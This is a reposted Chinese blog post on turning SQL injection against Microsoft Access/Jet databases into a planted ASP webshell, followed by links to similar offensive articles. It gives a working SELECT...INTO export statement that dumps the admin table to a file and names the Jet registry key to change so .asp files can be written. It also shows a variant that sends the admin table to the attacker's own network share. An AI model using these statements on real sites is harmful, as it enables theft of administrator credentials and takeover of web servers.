SQL注入Access导出WebShell

转载 2011年01月25日 12:48:00

 

已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。

最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。

几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件(可导出txthtmhtml等格式)的方法:

 

SELECT * into [test.txt] in 'd:/web/' 'text;' from admin

 

执行上述语句,在d:/web目录下就会生成test.txt文件,其内容就是表admin的内容。但是导出asp格式就不行,会说“不能更新,数据库或对象为只读”。

其实控制导出文件后缀是存储在注册表的,具体键值是HKEY_LOCALMACHINE/Software/Microsoft/Jet/4.0/Engines/Text/DisableExtension,默认情况下值为“!txt,csv,tab,asc,tmp,htm,html”,如果我们把asp也添加进去的话,呵呵,就可以导出asp格式的文件了。

这个方法跟那个调用AccessShell函数执行命令一样,要修改注册表,所以利用不是很大。

顺便提一下,前面提到的导出文本文件的方法如果不知道web路径貌似可以导出到自己机器的哦:SELECT * into [test.txt] in '//yourip/share' 'text;' from admin

 

 

 

 

 

本文转载自lake2

 

DVWA之从SQL注入到写入webshell

转自:http://www.nxadmin.com/penetration/1141.html 这篇文章谈论简单的技术,利用sql注入(SQLi)漏洞,并获得一个webshell,所有的演示都是...
  • u011500307
  • u011500307
  • 2013年10月28日 18:14
  • 2671

SQL Server数据导入到Access数据库

 将Access数据库数据导入到SQL Server 2005 第一步,开启SQLSERVER 2000服务管理,打开“企业管理器”,新建一个数据库,名称为“Access数据转换”; ...
  • liyanping521
  • liyanping521
  • 2014年12月19日 14:05
  • 1951

WEBSHELL姿势之SQL一句话

之前的两篇WEBSHELL姿势谈到了两种拿SHELL的方法(上传+解析漏洞、http-put/move方法),当然有时最简单的时候就是上传无限制,或者通过改filename后缀实现。这次我们要实验的就...
  • calmegm
  • calmegm
  • 2015年10月26日 22:37
  • 1515

ACCESS执行SQL语句导出一句话拿webshell

实用环境,在Access后台其他方法不能拿到webshell 但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了 不过需要知道物理路径才能导出,利用IIS的解析漏洞...
  • god_7z1
  • god_7z1
  • 2013年01月03日 10:49
  • 480

ACCESS执行SQL语句导出一句话拿webshell

7 2012-2 ACCESS执行SQL语句导出一句话拿webshell 分类:入侵笔记 | 评论:0 | 浏览: 实用环境,在access后台其他方法不能拿到webshell  ...
  • kendyhj9999
  • kendyhj9999
  • 2014年01月23日 10:44
  • 749

另类sql注入拿webshell

sql注入,想必大家都知道,本文教大家如果通过常规方法不行的前提下,拿下网站shell。 凡是以http://www.xxx.com/xxx.asp?id=1类似名称都可以通过著名的and 1=1 ...
  • lynnlovemin
  • lynnlovemin
  • 2012年12月08日 00:18
  • 3819

SQL注入之脚本篇-FOR ACCESS数据库

这个脚本写于2003年,终于能收到我自己的博客里了。如今这样的注入漏洞已经很少了,一是纯asp的站越来越少,二是成熟的站点多见,一些漏洞都被补得差不多了,此脚本可以封存起来了。。。^_^'     S...
  • cnLiou
  • cnLiou
  • 2013年06月15日 07:05
  • 453

Access数据库SQL注入小结

Access数据库SQL注入小结这里总结一下学到的Access数据库注入的知识点。
  • HappyOrange2014
  • HappyOrange2014
  • 2015年11月10日 08:33
  • 3636

asp+access sql手工注入步骤

理论介绍 数据库结构 access数据库 表 列 单元数据 实例 目标网址:http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?...
  • Geecky
  • Geecky
  • 2016年05月02日 17:29
  • 4703

轻松实现SQL Server与Access、Excel数据表间的导入导出

在SQL SERVER 2000/2005中除了使用DTS进行数据的导入导出,我们也可以使用Transact-SQL语句进行导入导出操作。在Transact-SQL语句中,我们主要使用OpenData...
  • a771948524
  • a771948524
  • 2013年10月22日 13:19
  • 862
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:SQL注入Access导出WebShell
举报原因:
原因补充:

(最多只允许输入30个字)